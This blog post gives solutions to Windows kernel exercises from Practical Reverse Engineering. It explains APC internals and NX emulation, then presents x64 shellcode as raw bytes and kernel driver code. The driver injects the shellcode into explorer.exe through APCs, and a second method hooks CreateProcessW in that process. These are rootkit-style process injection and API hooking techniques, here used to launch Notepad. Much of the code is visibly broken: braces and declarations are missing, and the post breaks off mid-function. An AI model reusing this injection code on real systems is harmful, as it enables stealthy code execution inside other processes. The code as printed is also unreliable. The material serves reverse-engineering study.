Monday, February 9, 2015

Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)

Here is the second part of the solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post is about the first eight that you will find in the "Investigating and Extending your Knowledge" section.
It should be noted that the code proposed in my solutions is to be intended as working POCs and that the methodologies can be generalized/improved so that they would work independently of the Windows version etc. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the KeUserModeCallback method).

NX is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on x64 architecture, and on x86 with PAE enabled.
Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation (e.g. W^X and ExecShield). The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.
Another potential way to emulate the NX bit would be to modify the page tables for the heap and stack in order to make them invalid: every access to a page would trigger a page fault, that would be trapped by the page fault handler. The OS would have to check the kind of fault, and determine if it is a memory read, write or execute. If it is execute, then there is something wrong and the process will be terminated. In theory, this would work, but in practice it would add a very big overhead on the run time (every memory access would cause an exception!), thus it may not be feasible (the PaX Linux kernel patch uses a similar approach).

The APIs that provide the functionality to manage APCs are KeInitializeApc and KeInsertQueueApc. Since they are not declared in the DDK headers it is necessary to assign their addresses to appropriate function pointers via MmGetSystemRoutineAddress in order to use them.
  • KeInitializeApc simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued to and the addresses of the callbacks to run.
  • KeInsertQueueApc, instead, does the actual work of scheduling the APC for execution in the given KAPC.Thread (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in KTHREAD.ApcQueueLock, necessary for proper synchronization. Then, if KTHREAD.ApcQueueable is set to 1, the API invokes the internal function KiInsertQueueApc, which in turn verifies that KAPC.Inserted is set to 0 and, if it is, adds the APC to some memory referenced by the KTHREAD.ApcStatePointer array. In particular, this array contains two pointers to KAPC_STATE structures, where the APC queues (implemented by using LIST_ENTRYs) are actually stored.
    Why two? The first KAPC_STATE structure is related to the APCs whose KAPC.ApcStateIndex is OriginalApcEnvrionment, while the second is related to the ones whose KAPC.ApcStateIndex is AttachedApcEnvironment. Basically, the value of KAPC.ApcStateIndex differentiates between the APCs that are running in the context of the process to which the thread belongs and the ones that are running in a thread that is attached to a different process. This is why two structures are kept.
    Once the correct one is determined, a further discrimination is to be made
    . Each structure contains an array of two LIST_ENTRY structures (named KAPC_STATE.ApcListHead), that are selected according to the value stored in KAPC.ApcMode, which is either 0 (KernelMode) or 1 (UserMode)These are the actual APCs queues.
    Once the APC is queued, the member KAPC.Inserted is set to 1, and then, if the APC is kernelmode, KTHREAD.KAPC_STATE.KernelApcPending is also set to 1. Furthermore, HalRequestSoftwareInterrupt may be invoked to switch to APC_LEVEL.
  • The queues of APCs will eventually be walked by the KiDeliverApc API, which will call the various kernel, normal and rundown routines for each APC.
APCs offer the possibility to execute code inside a specific process' context and there are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule some completion routines, to set and get a thread's context, and more.
Usermode APCs provide a handy way to execute code in usermode from kernelmode, commonly done by rootkits since it allows the possibility to inject malicious payloads in running processes, hook their APIs etc. Examples are presented in the answer to exercise 3.

Since there is no directly available API to create a process from kernel mode, I decided to leverage APCs to run malicious usermode code in a particular process. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.
The general strategy involves some preliminary operations to locate the target process, obtain its handle and allocate some memory in its process address space. The malicious code is then copied in this memory area (injection) and an APC is initialized in either one of these ways:
  1. Usermode APC with the normal routine set to the allocated area, that contains the malicious code.
  2. Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once, in the context of the target process.
  3. Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let KeUserModeCallback call it. The allocated area contains the malicious code.
There are of course many other methods to start a process from kernelmode code. For example, a possible variant of the second method, that doesn't involve APCs, would consist in using SetCreateProcessNotifyRoutine in order to inject the malicious code in every process that is created and then hooking a common API to redirect its code towards the malicious code. However, here I chose to focus solely on the three above mentioned ideas.

Method 1
For the first method, I used the APCs in the most natural way: I queued a usermode APC to Explorer that simply runs a "shellcode", which in turn locates and calls the CreateProcess API to execute Notepad.

First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:
 #include <stdio.h>  
 #include <intrin.h>  
 #include <windows.h>  
 typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,  
  LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,  
  LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);  
 void main(void)  
      unsigned __int64 ptrPEB;  
      unsigned __int64 ptrPEB_LDR_DATA;  
      unsigned __int64 ptrInLoadOrderModuleList;  
      unsigned __int64 DllBase;  
      unsigned int *pNames, *pAddresses;  
      PCREATEPROCESS pCreateProcess;  
      wchar_t *DllPath;  
      char app_notepad[12];  
      STARTUPINFO si;  
      app_notepad[0] = 'n';  
      app_notepad[1] = 'o';  
      app_notepad[2] = 't';  
      app_notepad[3] = 'e';  
      app_notepad[4] = 'p';  
      app_notepad[5] = 'a';  
      app_notepad[6] = 'd';  
      app_notepad[7] = '.';  
      app_notepad[8] = 'e';  
      app_notepad[9] = 'x';  
      app_notepad[10] = 'e';  
      app_notepad[11] = 0;  
      //memset(&si, 0, sizeof(si));  
      for(int j = 0; j < sizeof(si); j++)  
           ((char *)&si)[j] = 0;  
      si.cb = sizeof(si);  
      //memset(&pi, 0, sizeof(pi));  
      for(int j = 0; j < sizeof(pi); j++)  
           ((char *)&pi)[j] = 0;  
      CHAR *currentName;  
      ptrPEB = __readgsqword(0x60);  
      ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);  
      ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));  
      DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
      DllPath += 0x14;     // skip "C:\windows\system32\"  
           // 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00  
           if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&  
                ((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&  
                ((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )  
           ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);  
           DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
           DllPath += 0x14;     // skip "C:\windows\system32\"  
      DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);  
      pMZ = (IMAGE_DOS_HEADER*)DllBase;   
      pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);   
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);   
      pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);   
      pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);   
      for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)   
           currentName = (CHAR*)(DllBase + pNames[i]);   
           //43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41  
           if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&  
                ((unsigned __int32 *) currentName)[2] == 0x7365636f &&  
                ((unsigned short *) currentName)[6] == 0x4173 )  
                pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);  
      pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);  

This code purposely avoids the use of any API or CRT function in order to be relocatable. As a result, after compiling it, I was able to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.
The shellcode behaves similarly to the ones you can find in the exploits: it accesses the PEB to get the PEB_LDR_DATA and its InLoadOrderModuleList field, which is a pointer to a list of LDR_DATA_TABLE_ENTRY structures, each representing a loaded module. The code walks the list to locate kernel32.dll (the DLL name is kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, it retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse the PE header of the dll in order to locate its export table, and the address of the CreateProcessA API from it. The shellcode concludes by calling such API to launch Notepad.

Having the shellcode sorted out, let's see the code for the kernelmode driver (note that the shellcode is encoded in the "buffer[]" array):
 #include <Ntifs.h>  
 #include <string.h>  
 char buffer[] = {  
 0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,  
 0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,  
 0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,  
 0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,  
 0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,  
 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,  
 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,  
 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,  
 0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,  
 0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,  
 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,  
 0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,  
 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,  
 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,  
 0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,  
 0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,  
 0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,  
 0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,  
 0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,  
 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,  
 0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,  
 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,  
 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,  
 0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,  
 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,  
 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,  
 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,  
 0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,  
 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,  
 0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,  
 0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,  
 0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,  
 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,  
 0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,  
 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,  
 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,  
 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,  
 0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3  
 typedef enum _KAPC_ENVIRONMENT  
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   
      PVOID *SystemArgument2 )   
      DbgPrint("APC kernel routine\n");  
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
      DbgPrint("Unload routine\n");  
 DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)  
      PEPROCESS p_proc;  
      LIST_ENTRY *lentry;  
      LIST_ENTRY *le;  
      char * pImgFNam;  
      HANDLE pid;  
      BOOLEAN check = FALSE;  
      HANDLE ProcHandle = 0;  
      SIZE_T region_size = 4096;  
      ULONG zero_bits = 0;  
      UNICODE_STRING apiName;  
      UCHAR *baseaddr = 0;  
      ULONG bw;  
      NTSTATUS status_code;  
      CLIENT_ID client_id;  
      PETHREAD ethreads;  
      KAPC_STATE apc_state;  
      BOOLEAN (*PKeInsertQueueApc) (PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, UCHAR mode);   
      struct _KAPC *pApc;  
      DriverObject->DriverUnload = &MyUnload;  
      p_proc = PsGetCurrentProcess();  
      lentry = (LIST_ENTRY *) ( ((unsigned char*)p_proc) + 0x188 ); // ActiveProcessLinks : _LIST_ENTRY  
      for(le = lentry; le->Flink != lentry; le = le->Flink)  
           p_proc = (PEPROCESS) ( ((unsigned char*)le) - 0x188 );  
           pImgFNam = (char *)( ((unsigned char*) p_proc) + 0x2e0 );  
           if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)   
                check = TRUE;  
           return STATUS_UNSUCCESSFUL;  
      pid = PsGetProcessId(p_proc);  
      le = (LIST_ENTRY*) ( ((unsigned char *)p_proc) + 0x30); // ThreadListHead  
      ethreads = (PETHREAD) ( ((unsigned char*)(le->Flink)) - 0x2f8);  
      client_id.UniqueProcess = pid;  
      client_id.UniqueThread = PsGetThreadId(ethreads);  
      ObjAttr.Length = sizeof (OBJECT_ATTRIBUTES);  
      ObjAttr.RootDirectory = NULL;  
      ObjAttr.Attributes = OBJ_KERNEL_HANDLE;  
      ObjAttr.ObjectName = NULL;  
      ObjAttr.SecurityDescriptor = NULL;  
      ObjAttr.SecurityQualityOfService = NULL;  
      status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);  
      if(status_code != STATUS_SUCCESS)  
           return STATUS_UNSUCCESSFUL;  
      status_code = ZwAllocateVirtualMemory(ProcHandle, &baseaddr, (ULONG_PTR)&zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
      if(status_code != STATUS_SUCCESS)  
           return STATUS_UNSUCCESSFUL;  
      KeStackAttachProcess(p_proc, &apc_state);  
      memcpy(baseaddr, buffer, sizeof(buffer));  
      RtlInitUnicodeString(&apiName, L"KeInitializeApc");  
      PKeInitializeApc = MmGetSystemRoutineAddress(&apiName);   
      RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");  
      PKeInsertQueueApc = MmGetSystemRoutineAddress(&apiName);   
      pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));  
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);  
      if(!PKeInsertQueueApc(pApc, 0, 0, 0))  
           return STATUS_UNSUCCESSFUL;  
      return STATUS_SUCCESS;  

The driver begins by walking the ActiveProcessLinks from the EPROCESS structure in order to locate the EPROCESS corresponding to Explorer.exe (the target process). The code then retrieves the ThreadListHead from this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, PsGetProcessId and PsGetThreadId are called to retrieve the CID of the target process/thread. The driver proceeds by allocating an executable area of memory inside the process via ZwOpenProcess/ZwAllocateVirtualMemory, where it then copies the shellcode bytes. To perform the copy, the driver needs to switch to the Explorer process context via KeStackAttachProcess/KeUnstackDetachProcess.
Finally, an APC is initialized by calling KeInitializeApc and passing to it the pointer to the allocated shellcode as the normal routine. This Apc is finally queued to the target thread belonging to Explorer via KeInsertQueueApc. To be precise, during the initialization, a kernel routine is required by the OS as well, but since we don't really need it, I specified a dummy one that simply deinitializes the reserved memory for the KAPC structure.
At this point, whenever the target thread is scheduled for execution, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose a thread that is actually in an alertable state: some processes may have threads that are asleep or stuck in a wait, and if an APC is queued to them, it may never have a chance to be executed. In my case I picked the first thread of the Explorer process for a commodity: I noticed that this thread awakens when you right click on the icon of a folder on the desktop, thus it is very handy because it allowed me to trigger the APC manually whenever I want.

Method 2
As an alternative, I decided to hijack the execution flow of a process towards my shellcode harnessing kernelmode APCs. The idea is to patch an API that gets called quite often: the patch installs a jump to the shellcode in the entry point of the API, which, in turn, executes Notepad and calls the original API.

The code of the DriverEntry is almost the same as the one from Method 1, the only difference is that this time the scheduled APC is kernelmode and not usermode. The different lines of code are the following two:
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);  
      if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to Explorer.
The kernelmode APC is still targeting Explorer.exe like before. Similarly to the shellcode, it retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures to locate the imagebase of kernel32.dll. Once found, the routine retrieves the address of the CreateProcessW API from the export table, and proceeds by patching it in order to jump to the shellcode. I chose CreateProcessW just because it is easy to trigger it on command (e.g. by running a process from explorer's GUI), but the method applies equally to any other API.

The shellcode has also been slightly modified in that I added the following bytes:
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,  // last bytes of previous shellcode, padded with nops  
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // myflag dq 0  
 0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // mov rax,qword ptr gs:[40h] TEB.CliendId.UniqueProcess << entry  
 0x3d, 0x00, 0x00, 0x00, 0x00,                    // cmp   eax, <pid> (<pid> will be patched with the PID of explorer.exe)  
 0x75, 0x2d,                                      // jnz   Done  
 0x53,                                            // push  rbx  
 0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00,        // mov   rax, 0  
 0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00,        // mov   rbx, 1  
 0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff,  // lock  cmpxchg cs:myflag, rbx  
 0x5B,                                            // pop   rbx  
 0x75, 0x13,                                      // jnz   Done   (shellcode is run only once)  
 // save registers used by the shellcode routine: rax, rcx, r9, r8, rdx  
 0x41, 0x50,      // push  r8  
 0x41, 0x51,      // push  r9  
 0x50,            // push  rax  
 0x51,            // push  rcx  
 0x52,            // push  rdx  
 0xE8, 0x5F, 0xFC, 0xFF, 0xFF,       // call  shellcode (beginning of shellcode)  
 0x5a,            // pop   rdx  
 0x59,            // pop   rcx  
 0x58,            // pop   rax  
 0x41, 0x59,      // pop   r9  
 0x41, 0x58,      // pop   r8  
 0x48, 0x83, 0xec, 0x68,             // sub   rsp,68h  (first two instructions of CreateProcessW)  
 0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00,     // mov   rax,qword ptr [rsp+0B8h]  
 0xE9, 0x00, 0x00, 0x00, 0x00        // will be patched in order to jump to the rest of the original API instructions  

The JMP in the API entry point will actually transfer the execution to the third line of this block of instructions (the one marked with "entry"). This code begins by verifying that it is being run inside the Explorer process. It does so by comparing TEB.CliendId.UniqueProcess against a Pid hardcoded in the CMP instruction (fourth line). The CMP instuction has currently a Pid of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with the value of the Pid of the Explorer process. 
After this check, the code verifies that it has not been already run by examining the line containing "myflag dq 0". These eight bytes are a quadword that simply stores 
0 initially, and which is updated to 1 after the "lock    cmpxchg cs:myflag, rbx" is run for the first time.
If both checks are satisfied, the code saves some registers on the stack, and calls the original code that I have described in the previous method. When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of CreateProcessW and jumps to the third instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it jumps to the next instruction, but, as we will see later, the four bytes will be patched with the correct offset that will lead the execution flow right to the third instruction of CreateProcessW.
I had to save two instructions because when patching the API entry point I am writing a long JMP, which takes 5 bytes. The first instruction is only 4 bytes long, thus the patch ends up overwriting also the first byte of the following instruction. For this reason, the first two instructions must be preserved and executed in order to restore the original execution flow.
Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is fundamental to use a mini-disassembler to understand how many instructions are going to be overwritten during the patch (so that they can be saved in the shellcode itself). Also note that if the very first instructions are relative jumps or calls, they cannot be simply copied, but their relative offsets must be recalculated.

Finally, here is the code of the KernelRoutine:
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;  
      unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
      unsigned __int32 AddressOfNameOrdinals;  
      unsigned __int64 cr0;  
      int count = 0;  
      KIRQL apc_irql, old_irql;  
      // find CreateProcessW and patch it:  
      // find the peb from eprocess  
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
      // find LDR in the peb  
      p_ldr = peb + 0x18;  
      p_ldr = *((unsigned __int64 *)p_ldr);  
      // find kernel32 in one of the LDR  
      p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));  
      while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)  
           p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;    
      // get kernel32 imagebase  
      image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);   
      // parse export table to find CreateFileA and get the address  
      // image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]  
      image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;  
      export_table = *((unsigned __int32 *)image_data_directory) + image_base;  
      AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;  
      while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)  
           AddressOfNames += 4;  
